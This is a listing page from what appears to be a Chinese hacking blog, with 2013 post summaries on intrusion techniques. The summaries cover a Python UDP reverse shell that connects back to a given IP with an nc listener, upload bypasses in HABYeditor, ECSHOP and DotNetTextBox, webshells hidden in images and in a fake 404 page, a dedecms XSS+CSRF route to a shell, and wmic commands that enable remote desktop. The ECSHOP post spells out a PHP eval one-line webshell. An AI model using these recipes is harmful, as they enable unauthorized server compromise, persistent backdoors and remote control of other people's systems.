上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 30 下一页

2013年8月21日

python 反弹shell,加了UDP

摘要: 用来对付一些把除了80端口都封了的变态网管用法 back.py 123.123.123.123 53 udpnc监听:nc -l 53 -u后面不加udp的话还是默认的tcp因为udp没有sequence的特性,当数据超过1个数据包的大小时会错位,具体多大会分包不太清楚,我记得是1500字节?好像和MTU有关。命令不要打太长就行了(一般情况下好像基本不会有1500个字符的命令)其实就加了4行……# -*- coding:utf-8 -*-#!/usr/bin/env python"""back connect py version,only linux have 阅读全文

posted @ 2013-08-21 12:43 =_=! 阅读(1196) 评论(0) 推荐(0) 编辑

2013年8月5日

韩国某编辑器HABYeditor鸡肋漏洞!

摘要: 直接写htm文件,文件名:tmpcontent.htm:直接上传htm文件:文件名:tmpcontent.htm写个htm文件到服务器你们会发现会解析的!编辑器判断方法:editor/historyeditor/licenseeditor/htmlareaeditor/samples/sample_euckr.htmeditor/samples/sample_utf8.htmeditor/filemanager/php/upload.phpeditor/filemanager/php/savecontent.phpeditor/filemanager/php/filemanager_lib.p 阅读全文

posted @ 2013-08-05 21:31 =_=! 阅读(374) 评论(0) 推荐(0) 编辑

2013年7月29日

突破php 的imagecopyresampled 和imagecopyresized 实现图片马 JPG

摘要: 之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算详见:https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/但是受限于图像的尺寸 必须320×320 且必须是PNG格式那JPG怎么办神奇的老外 提出了列方法 In case of successful injection you will get a specially crafted image, which should be upl.. 阅读全文

posted @ 2013-07-29 00:35 =_=! 阅读(419) 评论(0) 推荐(0) 编辑

2013年7月28日

不常见的注入点

摘要: 注入点:www.baidu.com/sql/havij:www.baidu.com/sql/%Inject_Here%sqlmap:www.baidu.com/sql/* 阅读全文

posted @ 2013-07-28 03:59 =_=! 阅读(140) 评论(0) 推荐(0) 编辑

2013年6月6日

dedecms利用xss+csrf getshell

摘要: dedecms的漏洞很多,但是厂商都是不做修复。之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。 后台可触发xss 利用js代码 01 varrequest =false; 02 if(window.XMLHttpRequest) { 03 request =newXM... 阅读全文

posted @ 2013-06-06 18:15 =_=! 阅读(655) 评论(0) 推荐(0) 编辑

2013年5月20日

ECSHOP网站程序可以绕过权限上传一句话木马

摘要: 可以绕过权限上传一句话木马前台留个言,内容是我们的一句话木马:<?php eval($_POST[cmd]);?>接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存放留言的表)备份文件名:xxx.php;.sql 这种格式来备份提示成功了。一句话连接成功 阅读全文

posted @ 2013-05-20 23:21 =_=! 阅读(517) 评论(0) 推荐(0) 编辑

2013年5月11日

那些强悍的PHP一句话后门

摘要: 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The req 阅读全文

posted @ 2013-05-11 07:37 =_=! 阅读(152) 评论(0) 推荐(0) 编辑

2013年5月7日

cmd开3389 win08 win03 win7 win2012 winxp

摘要: 起因是当想去配个VPN用用的时候,结果蛋疼的碰到一堆没开3389的Windows server 2008 R2 ...cmd下,其实很简单。win08,三条命令即可:wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting whe 阅读全文

posted @ 2013-05-07 22:32 =_=! 阅读(741) 评论(0) 推荐(0) 编辑

2013年5月3日

DotNetTextBox编辑器漏洞,可上传任意文件

摘要: otNetTextBox编辑器洞洞文件上传漏洞1、用firebug将disabled="disabled',value="jgp,gif,png"修改为enabled="enabled",value="jpg,gif,png,aspx",然后点更新成功按钮2、弹出更新成功3、刷新页面,发现此时可允许上传的图片类型,成功新增aspx类型4、找个aspx webshell上传、提示文件上传成功5、上传成功、成功躺在那里6、webshell页面 阅读全文

posted @ 2013-05-03 18:33 =_=! 阅读(305) 评论(0) 推荐(0) 编辑

2013年4月22日

在图片中插入一句话木马

该文被密码保护。 阅读全文

posted @ 2013-04-22 06:24 =_=! 阅读(1) 评论(0) 推荐(0) 编辑

上一页 1 ··· 5 6 7 8 9 10 11 12 13 ··· 30 下一页

导航